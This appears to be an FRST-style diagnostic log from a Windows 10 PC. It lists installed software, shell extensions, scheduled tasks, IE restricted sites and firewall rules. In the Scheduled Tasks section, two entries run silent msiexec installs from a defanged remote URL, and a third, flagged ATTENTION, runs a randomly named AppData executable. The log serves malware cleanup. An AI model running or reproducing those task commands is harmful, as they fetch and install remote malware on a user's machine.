Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4653 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: - )
Kingdom Come Deliverance (HKLM-x32\...\Kingdom Come Deliverance_is1) (Version: - )
Malwarebytes verze 3.6.1.2711 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes)
Microsoft Office 365 ProPlus - cs-cz (HKLM\...\O365ProPlusRetail - cs-cz) (Version: 16.0.9126.2336 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-195099987-321758953-278711717-1001\...\OneDriveSetup.exe) (Version: 18.065.0329.0002 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{d98165f5-8b37-4100-8852-a0664374ff8a}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
MKVToolNix 9.8.0 (64bit) (HKLM-x32\...\MKVToolNix) (Version: 9.8.0 - Moritz Bunkus)
Mozilla Firefox 59.0.2 (x64 en-US) (HKLM\...\Mozilla Firefox 59.0.2 (x64 en-US)) (Version: 59.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 59.0.2.6656 - Mozilla)
NetTime (HKLM-x32\...\NetTime_is1) (Version: - Mark Griffiths)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0405-0000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Port Royale V1.4.0.2 (HKLM-x32\...\Port Royale_is1) (Version: - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Samsung Easy Document Creator (HKLM-x32\...\Samsung Easy Document Creator) (Version: 1.06.60 (17.03.2015) - Samsung Electronics Co., Ltd.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.82.00(27.07.2015) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.70.18.0 - Samsung Electronics Co., Ltd.)
Samsung OCR Software (HKLM-x32\...\Samsung OCR Software) (Version: 1.01.10 (20.06.2014) - Samsung Electronics Co., Ltd.)
Samsung Printer Diagnostics (HKLM-x32\...\Samsung Printer Diagnostics) (Version: 1.0.0.17 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Samsung Scan Process Machine (HKLM-x32\...\Samsung Scan Process Machine) (Version: 1.03.05.25 - Samsung Electronics Co., Ltd.) Hidden
Samsung SCX-3400 Series (HKLM-x32\...\Samsung SCX-3400 Series) (Version: 1.29 (09.09.2015) - Samsung Electronics Co., Ltd.)
Samsung Universal Scan Driver (HKLM-x32\...\Samsung Universal Scan Driver) (Version: 1.2.19.0 - Samsung Electronics Co., Ltd.)
Skype verze 8.33 (HKLM-x32\...\Skype_is1) (Version: 8.33 - Skype Technologies S.A.)
SMPlayer 17.1.0 (x64) (HKLM\...\SMPlayer) (Version: 17.1.0 - Ricardo Villalba)
SNS Upload for Easy Document Creator (HKLM-x32\...\{B6B5F07C-88D5-49D3-A1A7-A6D4BC37DCCC}) (Version: 1.0.0 - Samsung Electronics Co.,Ltd)
SoftPerfect WiFi Guard version 2.0.2 (HKLM\...\{38AFD787-4D2E-4442-92D2-7739F5F92CF4}_is1) (Version: 2.0.2 - SoftPerfect)
South Park The Fractured But Whole version 1.0 (HKLM\...\South Park The Fractured But Whole_is1) (Version: 1.0 - CODEPUNKS)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.2.1.8 - Synaptics Incorporated)
The Battle for Middle-earth (tm) II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version: - )
Uninstall Samsung Printer Software (HKLM-x32\...\TotalUninstaller) (Version: 4.0.0.67 - Samsung Electronics CO., LTD.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9CBA860F-7437-4A75-941C-8EF559F2D145}) (Version: 2.52.0.0 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666 - Nullsoft, Inc)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-195099987-321758953-278711717-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\atiacm64.dll [2015-08-04] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-05-18] (Intel Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0273991C-90F1-49BB-A997-73BF1C769F3D} - System32\Tasks\gcknyzn => "msiexec" -package hxxps://superdomain1709.info/ipuaop.nqm /q
Task: {0E14317D-2102-48FC-AAB8-68A9D0B3F691} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-06-24] (Realtek Semiconductor)
Task: {106A7FD6-C7D6-418B-AF21-09A77484159A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {16447E2A-F695-419E-8243-9BF676ECAD36} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2018-12-21] (Microsoft Corporation)
Task: {2208097B-6069-4E4E-B34D-B6C6499D266E} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-195099987-321758953-278711717-1001 => C:\Users\ulol\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {23D45486-6328-445F-8E32-ADBAA1F22487} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-13] (Adobe Systems Incorporated)
Task: {2BEBB49D-B57F-4F93-8080-66415D045BD2} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-12-21] (Microsoft Corporation)
Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau
Task: {598F7A69-A348-4C5E-A5CA-F3A37912C800} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2018-12-21] (Microsoft Corporation)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {6A20F2C7-5CF8-4654-BAC1-A87B26620985} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2016-02-26] (Advanced Micro Devices, Inc.)
Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {7F911834-FCA6-409C-A3A1-BBEFD2BE1E88} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {90DD05AC-EC80-4EB1-B27B-C21214053600} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-12-10] (Microsoft Corporation)
Task: {A5DAA59E-7902-47D5-B0FC-63D446828035} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {AD4942CE-F2AB-45E9-A0F7-A0A0696AF497} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2018-12-21] (Microsoft Corporation)
Task: {B0400B46-4EE3-44BE-9C04-F436BEF5665F} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {C51D1053-58AD-40DC-8AD7-42F044919F19} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-12-21] (Microsoft Corporation)
Task: {C8ED55E2-B8FB-4DD4-8E05-EB726C93E126} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-12-10] (Microsoft Corporation)
Task: {D643AA16-031E-4AF0-9CA3-98406A054B0E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2019-01-10 17:53 - 2018-11-15 11:01 - 002712432 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-12-12 09:01 - 2018-11-09 03:17 - 002759680 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-12-14 19:16 - 2018-12-14 19:21 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
2018-10-09 12:41 - 2018-10-09 12:41 - 000015872 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe
2018-10-09 12:41 - 2018-10-09 12:41 - 007562752 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

There are 7865 more sites.

IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123simsen.com -> www.123simsen.com

There are 7865 more sites.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-195099987-321758953-278711717-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\ulol\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "BlueStacks Agent"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{680A3119-9C48-4A9D-8F3E-DCBBF626867E}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{9CD32ACD-CFD6-45A4-B4DF-C9EF3A4052CB}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{0C967B64-CE0C-456C-B174-8178F48D6104}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [TCP Query User{D803BB9E-7542-4BAA-920B-DAA1792A535A}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [{74BBCAA8-0F85-4E7C-AB86-EBFEFC54D83F}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{EF7CD7A6-B6AD-4289-952D-49D310DF7E02}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{1F3F6959-FCD3-404A-95E2-17B36DCB540F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3B79ECD1-9CEC-4E00-B545-A2262DDC26BA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [UDP Query User{6C071EF6-C6C0-4D88-B919-ACD84451EF09}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [TCP Query User{01339B68-9EF4-4C99-8E75-3C99DCBE8EF1}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [{418D3690-1654-4D36-9C65-E4881416F186}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{FD052E8D-5947-4005-9113-A4B0DA632966}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{865BC1B9-BDE3-408E-923A-336E538AB506}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2AC8C8A2-451C-4D9E-935F-4999B88AF985}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2BA6C829-EF73-4535-A7F7-CA54E9CB4E93}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{2221AC8E-0468-49A9-A0AE-489AC315ADF2}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{BA30716E-B3D5-4765-BFD4-2BFAB06F3A6E}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{C5027FDD-ABB1-4575-9FEB-30CEF15A0174}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{44620DE5-6297-4A22-853E-0F6BE8BC6C95}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\Scan2PCNotify.exe
FirewallRules: [{0125CC0F-2664-4DDC-8773-036A1480E45E}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\ScanProcess.exe
FirewallRules: [{10FEC841-DB04-4EC4-B51B-926818D78CEF}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\CDAS2PC.exe
FirewallRules: [{1B2BD275-5E88-4056-97F9-B9F00CEF4644}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\uninstall.exe
FirewallRules: [{DE602CDB-BEB2-49D6-8108-72A718061FA8}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDSAlert.exe
FirewallRules: [{8D7B0C18-C2F1-4044-924F-CB7ABE7F31C5}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\OrderSupplies.exe
FirewallRules: [{65B2ED45-5E31-4CC1-92C6-8038109E3170}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDS.Application.exe
FirewallRules: [{8AB3011A-5645-45FF-A547-B893F1D2B6BF}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{B4F4E17F-C2EF-4854-AD4C-8B2708E8AC1F}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{6FA07099-4EA9-452A-9FA8-995B59ECAE90}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [UDP Query User{AC472FF0-E9BA-477F-8C59-E0CF6E26B1F6}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{29EB2B2E-4FA2-4FA9-ADB8-FB3EA85EE2C0}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{1B152717-C9E6-4543-87BB-5D4E311A0B0F}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [{100C66FD-2DCC-4B01-8D14-02FFD2C069A9}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [UDP Query User{632511C2-DDFC-4CEF-8C55-A82E8EB56B2A}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{809F3FAE-2B59-440B-8219-81CB5996542E}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{58ECFD65-9A3C-47BA-AB19-B2A27BACEC84}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{3E457CE4-B263-445B-916E-10B85CEBE320}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [UDP Query User{80F90ED6-45B2-4117-84CF-FBCBE2F06D08}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{5DAE795F-7DD0-4F03-A957-23178027EC7F}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{76359A4C-3A58-4EE1-A908-4ADE16275DBF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{0FF7A781-7AB7-4397-B417-0E5504F6C62C}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [UDP Query User{946CEECC-8221-41F2-AF67-5BF9A2797A88}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{C8A027E8-6DAB-4F49-9015-1E2037DE8C23}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{DFF9485B-1726-4727-ACCD-1E22F49A5F76}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0516401-11A3-4DCC-A5CB-691CF7FA910D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A8991BE6-8068-4C4F-8482-08861EAF061C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3144E693-40E1-40BA-AD59-C5B0752F98E1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{DE99C12C-1421-4D07-B3C1-5D2D854A4EFD}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{76B4001E-0ACD-45A3-A91A-18D739417786}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{80E9FEE1-E9D6-415C-9E57-42C9395DCACF}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{420EDF67-B57A-4B23-B6AF-93ACAC9F0A06}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
